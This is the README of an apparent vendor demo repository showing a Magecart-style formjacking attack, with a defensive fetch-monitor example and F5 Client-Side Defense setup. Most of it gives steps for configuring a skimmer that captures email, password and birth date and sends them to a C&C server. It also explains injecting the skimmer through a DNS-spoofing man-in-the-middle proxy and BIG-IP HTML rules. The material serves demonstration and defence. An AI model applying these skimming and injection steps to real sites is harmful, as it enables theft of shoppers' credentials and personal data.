aletessier/f5-magecart

Formjacking Attack

All layers

This repository provides sample formjacking code to show how such an attack works.

F5 customers are protected from Magecart-style attacks by F5 Client-Side Defense, which:

  • Analyses the behaviour of all JavaScript executed on your website
  • Alerts your Cyber-SOC team if a JavaScript behaves like malware, so action can be taken immediately (allow/block)
  • Blocks malicious JavaScript execution
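To make the allow/alert/block model above concrete, here is a minimal behavioural monitor written for this page (example code, not F5 CSD and not part of this repository). It assumes the shop talks only to its own API origin and uses hypothetical helper names; the origin and credentials are constructed values.

```javascript
// Added example: behavioural monitor for formjacking-style exfiltration.
// Hypothetical code, not F5 Client-Side Defense.

// Assumption (constructed): the shop only talks to its own API origin.
const PAGE_ORIGIN = "https://shop.example";
const ALLOWED_ORIGINS = new Set([PAGE_ORIGIN]);

// Classify one outbound request by where it goes and what it carries.
// `sensitiveValues` are the current values of the page's credential inputs.
// Plain substring matching is a deliberate simplification: a skimmer that
// encodes or encrypts its payload would not be matched, which is why a
// request to an unknown origin still raises an alert on its own.
function classifyRequest(url, body, sensitiveValues, allowed = ALLOWED_ORIGINS) {
  let origin;
  try {
    origin = new URL(url, PAGE_ORIGIN).origin; // relative URLs resolve to the page
  } catch (_err) {
    return { verdict: "alert", reason: "unparseable url", url, leaks: 0 };
  }
  const text = typeof body === "string" ? body : body ? JSON.stringify(body) : "";
  const leaks = sensitiveValues.filter((v) => v && text.includes(v)).length;
  if (allowed.has(origin)) return { verdict: "allow", origin, leaks };
  if (leaks > 0) return { verdict: "block", reason: "form data sent to unknown origin", origin, leaks };
  return { verdict: "alert", reason: "request to unknown origin", origin, leaks };
}

// Browser-side hook: wrap window.fetch so every call is classified against the
// values currently held by the page's credential inputs. A full monitor would
// also wrap XMLHttpRequest, navigator.sendBeacon and image-based beacons.
// Returns false outside a browser (e.g. under Node), so the logic stays testable.
function installFetchMonitor(report, allowed = ALLOWED_ORIGINS) {
  if (typeof window === "undefined" || typeof window.fetch !== "function") return false;
  const realFetch = window.fetch.bind(window);
  window.fetch = (input, init = {}) => {
    const url = typeof input === "string" ? input : input.url;
    const values = Array.from(
      document.querySelectorAll("input[type=password], input[type=email]")
    ).map((el) => el.value);
    const result = classifyRequest(url, init.body, values, allowed);
    if (result.verdict !== "allow") report(result); // e.g. POST to your SOC endpoint
    if (result.verdict === "block") return Promise.reject(new Error("request blocked by monitor"));
    return realFetch(input, init);
  };
  return true;
}
```

Call `installFetchMonitor(r => console.warn(r))` early in the page's own bundle so the hook is in place before any injected script runs.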

Thanks to Unit 42, which wrote a great blog post on this topic here.

  • Open the web page containing the targeted form
  • Inspect the input elements that hold user data. Each element can be identified by an id, a name, a type, etc.:
<input ... id="login-credentials-form-password" name="password-uuid" type="password" ...>
  • Open the file skimmer.js
  • Update the first 2 or 3 lines, which describe the input elements to grab user data from:
window["data_leak_label_email"] = ["input[id*='login-credentials-form-email']", "input[name*='email']", "input[type*='email']"]
window["data_leak_label_password"] = ["input[id*='login-credentials-form-password']", "input[name*='password']"]
window["data_leak_label_birth_date"] = ["input[id*='login-credentials-form-birthdate']", "input[name*='birthDate']"]
  • Go back to the web page and inspect the button element used when the user submits the form:
<button ... type="submit" id="login-button">
  • In skimmer.js, the fourth line describes the button element to watch in order to send data to the remote C&C server:
window["data_leak_label_submit_button"] = ["button[id*='login-button']"]
  • If the form contains more or fewer input fields, update the function listener_fetch_data_leak() so that it references exactly the input elements defined previously:
data_leak = {
    "email": get_element_value(window["data_leak_label_email"]),
    "password": get_element_value(window["data_leak_label_password"]),
    "birth_date": get_element_value(window["data_leak_label_birth_date"]),
    "uagent": navigator.userAgent
}
  • Run the C&C server as described here
  • Run a reverse proxy that acts as a man-in-the-middle, forwarding all traffic to the origin servers
  • If the DNS domain is spoofed, rewrite the SNI and headers (Host, Origin and any others required by the application)
  • Inject the malicious JS skimmer.js into all or specific pages

BIG-IP UI configuration for JS insertion:

Local Traffic ›› Profiles : Content : HTML : Rules /Common/form_grabber
  +-- Match settings ›› Match Tag Name: head
  +-- Action settings ›› HTML to Append: paste the content of skimmer.js surrounded by <script>...</script>

Local Traffic ›› Profiles : Content : HTML : /Common/html-demo
  +-- HTML rules: form_grabber

Local Traffic ›› Virtual Servers ›› vs-demo
  +-- HTML Profile: html-demo

  • Enable compression on the client side / downstream side if the origin servers use compression
  • Connect to F5 Distributed Cloud
  • Get your Client-Side Defense (CSD) JS
  • Inject the CSD JS into the web page to protect as well

BIG-IP UI configuration for JS insertion:

Local Traffic ›› Profiles : Content : HTML : Rules /Common/f5_csd
  +-- Match settings ›› Match Tag Name: head
  +-- Action settings ›› HTML to Append: paste the F5 CSD JS link

Local Traffic ›› Profiles : Content : HTML : /Common/html-demo
  +-- HTML rules: form_grabber + f5_csd
